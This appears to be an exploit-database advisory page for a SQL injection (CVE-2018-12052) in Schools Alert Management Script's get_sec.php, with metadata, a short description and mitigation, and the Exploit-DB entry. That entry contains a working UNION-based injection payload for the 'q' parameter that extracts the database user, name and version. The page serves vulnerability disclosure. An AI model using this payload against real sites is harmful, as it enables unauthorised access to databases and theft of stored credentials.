header-logo
Suggest Exploit
vendor:
Schools Alert Management System
by:
M3@Pandas
9.8
CVSS
CRITICAL
SQL Injection
89
CWE
Product Name: Schools Alert Management System
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: YES
Related CWE: CVE-2018-12052
CPE: a:phpscriptsmall:schools_alert_management_system
Metasploit: N/A
Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=12052https://www.infosecmatter.com/nessus-plugin-library/?id=12205https://www.infosecmatter.com/nessus-plugin-library/?id=12065https://www.infosecmatter.com/nessus-plugin-library/?id=15963https://www.infosecmatter.com/nessus-plugin-library/?id=15970https://www.infosecmatter.com/nessus-plugin-library/?id=15456https://www.infosecmatter.com/nessus-plugin-library/?id=15572https://www.infosecmatter.com/nessus-plugin-library/?id=12209https://www.infosecmatter.com/nessus-plugin-library/?id=12054https://www.infosecmatter.com/nessus-plugin-library/?id=12055
Platforms Tested: Linux Mint
2018

Schools Alert Management Script – ‘get_sec.php’ SQL Injection

An SQL injection vulnerability exists in Schools Alert Management Script, which allows an attacker to execute arbitrary SQL commands via the 'get_sec.php' script. The vulnerability is due to insufficient sanitization of user-supplied input to the 'q' parameter. An attacker can exploit this vulnerability to gain access to sensitive information such as usernames, passwords, and other sensitive data stored in the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

# Exploit Title: Schools Alert Management Script - 'get_sec.php' SQL Injection
# Date: 2018-06-07
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/
# Category: Web Application
# Exploit Author: M3@Pandas
# Web: https://github.com/unh3x/just4cve/issues/3
# Tested on: Linux Mint
# CVE: CVE-2018-12052

# Proof of Concept:

/get_sec.php?q=1'+/*!50000union*/+select+1,/*!50000concat*/(user(),0x7e7e,database(),0x7e7e,@@version)%23

Navigation

Suggest Exploit

Services By CQR